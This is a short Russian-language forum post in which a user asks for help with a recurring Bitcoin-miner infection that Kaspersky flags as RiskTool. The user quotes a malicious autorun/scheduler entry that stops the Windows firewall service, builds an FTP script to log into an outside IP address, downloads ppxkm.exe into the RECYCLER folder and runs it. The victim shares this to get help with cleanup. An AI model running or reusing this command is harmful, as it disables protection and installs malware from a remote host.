Вложений: 1
каждый раз Касперским обнаруживается неизвестный вирус [not-a-virus:RiskTool.Win32.BitCoinMiner.irbf, not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen
]
до этого вручную очищал планировщик и автозагрузку в реестре
скопировал строку с автозагрузки или с планировщика:
"c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 198.44.226.161> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get ppxkm.exe c:\RECYCLER\ppxkm.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&ppxkm.e"
логи autologger во вложении